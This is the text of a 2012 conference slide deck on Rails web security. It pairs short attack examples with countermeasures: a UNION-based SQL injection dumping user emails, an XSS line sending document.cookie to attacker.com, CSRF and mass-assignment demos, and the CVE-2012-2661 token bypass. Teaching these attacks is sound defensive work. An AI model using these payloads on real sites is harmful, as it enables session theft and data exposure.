Web Application Security in Rails

Slide 1

Slide 1 text

WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012

Slide 2

Slide 2 text

Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael

Slide 3

Slide 3 text

Buy Now, Pay Later 1.  Shop online 2.  Receive your goods 3.  Pay

Slide 4

Slide 4 text

Alice

Slide 5

Slide 5 text

Bob

Slide 6

Slide 6 text

Alice and Bob

Slide 7

Slide 7 text

Alice and Bob

Slide 8

Slide 8 text

Alice and Bob Like Duh?

Slide 9

Slide 9 text

Alice and Bob MicroBlogging ... #$@# %#@&*#$

Slide 10

Slide 10 text

Alice and Bob Hack it!

Slide 11

Slide 11 text

SQL INJECTION

Slide 12

Slide 12 text

@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection

Slide 13

Slide 13 text

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --

Slide 14

Slide 14 text

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %') SQL Injection

Slide 15

Slide 15 text

SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %') SQL Injection

Slide 16

Slide 16 text

@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection - countermeasures

Slide 17

Slide 17 text

CROSS SITE SCRIPTING XSS

Slide 18

Slide 18 text

<%= raw feed_item.content %> XSS

Slide 19

Slide 19 text

document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); XSS

Slide 20

Slide 20 text

<%= sanitize feed_item.content, :tags => ['a’] %> XSS - countermeasures

Slide 21

Slide 21 text

The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS

Slide 22

Slide 22 text

CROSS SITE REQUEST FORGERY CSRF

Slide 23

Slide 23 text

www.blog.com CSRF 1

Slide 24

Slide 24 text

www.blog.com 2 Click here for free iPad www.freeiPad.com … document.evilform.submit() CSRF

Slide 25

Slide 25 text

www.blog.com www.freeiPad.com … document.evilform.submit() CSRF 3

Slide 26

Slide 26 text

www.blog.com www.freeiPad.com … document.evilform.submit() POST /blogpost Content=“Kick Me!” CSRF 4

Slide 27

Slide 27 text

Slide 28

Slide 28 text

routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF

Slide 29

Slide 29 text

class ApplicationController < ActionController::Base # commented to easily test forms # protect_from_forgery ... end CSRF

Slide 30

Slide 30 text

The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF

Slide 31

Slide 31 text

RAILS SPECIFIC ATTACKS

Slide 32

Slide 32 text

MASS ASSIGNMENT boo[gotcha!]

Slide 33

Slide 33 text

def create @user = User.new(params[:user]) ... end Mass Assignment

Slide 34

Slide 34 text

def create @user = User.new(params[:user]) ... end Mass Assignment { :name => “gotcha”, :admin => true }

Slide 35

Slide 35 text

Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass Assignment - countermeasures

Slide 36

Slide 36 text

Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_conﬁrmation ... Mass Assignment - countermeasures

Slide 37

Slide 37 text

Global Conﬁg (whitelist) conﬁg.active_record. whitelist_attributes = true Mass Assignment - countermeasures

Slide 38

Slide 38 text

The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment

Slide 39

Slide 39 text

SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)

Slide 40

Slide 40 text

User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection

Slide 41

Slide 41 text

/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection

Slide 42

Slide 42 text

The Attack: SQL Injection - Aﬀected version: Rails < 3.2.4 Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection

Slide 43

Slide 43 text

------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman

Slide 44

Slide 44 text

CONCLUSIONS

Slide 45

Slide 45 text

Make Love not War

Slide 46

Slide 46 text

Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions

Slide 47

Slide 47 text

Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial Thanks to…

Slide 48

Slide 48 text

Pay Online – Safer and Simpler https://github.com/unativ/sample_app